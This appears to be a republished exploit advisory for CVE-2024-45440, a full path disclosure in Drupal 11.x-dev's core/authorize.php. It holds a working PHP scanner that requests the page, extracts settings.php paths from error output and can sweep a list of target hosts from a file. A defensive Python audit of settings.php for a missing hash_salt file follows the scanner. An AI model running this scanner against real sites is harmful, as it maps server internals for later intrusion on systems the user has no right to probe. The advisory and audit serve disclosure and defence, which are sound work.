Drupal 11.x-dev, being a development branch, may exhibit information disclosure vulnerabilities. These typically stem from verbose error reporting, debugging configurations, or unhardened default settings common in pre-release software.
Such disclosures can expose sensitive server-side details like full file paths, internal system information, or specific configuration values. This data is invaluable for attackers performing reconnaissance, potentially aiding in further targeted exploits.
It's crucial to remember that development branches are not production-ready and are expected to have such issues. The Drupal security team actively identifies and remediates these vulnerabilities before stable releases, ensuring a hardened final product. Users testing dev versions should exercise caution and never deploy them in a live environment.
=============================================================================================================================================
| # Title : Drupal 11.x-dev full Information Disclosure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.drupal.org/project/drupal/releases/11.x-dev |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/190573/ & CVE-2024-45440
[+] Summary :
The vulnerability is caused by improper error handling in authorize.php when the hash_salt setting is populated by file_get_contents() on a file that does not exist.
The resulting error reveals the full server path even when error logging is disabled.
[+] POC :
php poc.php or http://127.0.0.1/poc.php
<?php
/*
 * Drupal 11.x-dev Full Path Disclosure
 * CVE-2024-45440
 * PHP Implementation
 */
class DrupalPathDisclosure {
    private $timeout = 10;
    private $user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0';

    // Request core/authorize.php and report any settings.php path echoed in the error page.
    public function scan_single($url) {
        echo "[*] Scanning: $url\n";
        if (!str_starts_with($url, 'http')) {
            $url = 'http://' . $url;
        }
        $full_url = $url . '/core/authorize.php';

        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $full_url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => $this->timeout,
            CURLOPT_USERAGENT => $this->user_agent,
            CURLOPT_FOLLOWLOCATION => false,
            CURLOPT_SSL_VERIFYPEER => false
        ]);
        $response = curl_exec($ch);
        // curl reports failures through its return value, not through exceptions.
        if ($response === false) {
            echo "[-] Error: " . curl_error($ch) . "\n";
            curl_close($ch);
            return false;
        }
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);

        if ($http_code == 200 && strpos($response, 'settings.php') !== false) {
            // Only Unix-style absolute paths (leading "/") are matched here.
            preg_match_all('/<em class="placeholder">(\/.*?settings\.php)/', $response, $matches);
            if (!empty($matches[1])) {
                echo "[+] Vulnerable - Paths disclosed:\n";
                foreach ($matches[1] as $path) {
                    echo " $path\n";
                }
                return true;
            }
        }
        echo "[-] Not vulnerable\n";
        return false;
    }

    // Run scan_single() for every non-empty line of $file_path and print a summary.
    public function scan_multiple($file_path) {
        if (!file_exists($file_path)) {
            echo "[-] File not found: $file_path\n";
            return;
        }
        $urls = file($file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        $vulnerable = [];
        echo "[*] Scanning " . count($urls) . " targets...\n";
        foreach ($urls as $url) {
            if ($this->scan_single($url)) {
                $vulnerable[] = $url;
            }
            echo "\n";
        }
        if (!empty($vulnerable)) {
            echo "[+] Summary - Vulnerable hosts:\n";
            foreach ($vulnerable as $host) {
                echo " $host\n";
            }
        } else {
            echo "[-] No vulnerable hosts found\n";
        }
    }
}

// CLI Interface
if (php_sapi_name() === 'cli') {
    $scanner = new DrupalPathDisclosure();
    if ($argc < 2) {
        echo "Usage:\n";
        echo " php drupal_path.php <url> - Scan single target\n";
        echo " php drupal_path.php -f <file> - Scan multiple targets from file\n";
        echo "\nExamples:\n";
        echo " php drupal_path.php example.com\n";
        echo " php drupal_path.php -f targets.txt\n";
        exit(1);
    }
    if ($argv[1] === '-f' && isset($argv[2])) {
        $scanner->scan_multiple($argv[2]);
    } else {
        $scanner->scan_single($argv[1]);
    }
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
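
The Summary ties the disclosure to a hash_salt that is read with file_get_contents() from a file that does not exist. The Python audit below is an added example, not part of the original advisory or of Drupal, that checks a settings.php for that condition. Its function names, status labels and sample paths are assumptions made for illustration, and its comment stripping is a heuristic rather than a PHP parser.

```python
import os
import re

# Heuristic patterns for the ways settings.php normally sets the salt.
ASSIGN = re.compile(r"""\$settings\[\s*['"]hash_salt['"]\s*\]\s*=\s*(.+?);""", re.S)
FROM_FILE = re.compile(r"""file_get_contents\(\s*(['"])(.+?)\1\s*\)""")
LITERAL = re.compile(r"""^(['"])(.*)\1$""", re.S)

# Constructed sample: the first assignment is commented out, the second is live.
SAMPLE = """<?php
# $settings['hash_salt'] = file_get_contents('/home/example/salt.txt');
$settings['hash_salt'] = file_get_contents('/constructed/path/salt.txt');
"""


def strip_php_comments(src):
    """Drop /* */ blocks and whole-line # or // comments (heuristic only)."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.S)
    return "\n".join(line for line in src.splitlines()
                     if not line.lstrip().startswith(("#", "//")))


def audit_hash_salt(settings_src, file_exists=os.path.isfile):
    """Return (status, detail) for the effective hash_salt assignment."""
    matches = ASSIGN.findall(strip_php_comments(settings_src))
    if not matches:
        return ("missing", "no active hash_salt assignment")
    expr = matches[-1].strip()  # the last assignment wins in PHP
    from_file = FROM_FILE.search(expr)
    if from_file:
        path = from_file.group(2)
        if not file_exists(path):
            # The condition the advisory describes: salt file is absent.
            return ("at-risk", "salt file does not exist: " + path)
        return ("ok", "salt read from existing file: " + path)
    literal = LITERAL.match(expr)
    if literal:
        if literal.group(2):
            return ("ok", "inline salt")
        return ("missing", "empty salt string")
    # Anything dynamic (getenv, concatenation, ...) needs a human look.
    return ("review", "unrecognised expression: " + expr)


if __name__ == "__main__":
    print(audit_hash_salt(SAMPLE))
```

Run it as the web server's user so the existence check reflects what PHP itself would see; relative paths are resolved against the current working directory.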
Drupal 11.x-dev Information Disclosure
- Written by: khalil shreateh
- Category: Vulnerabilities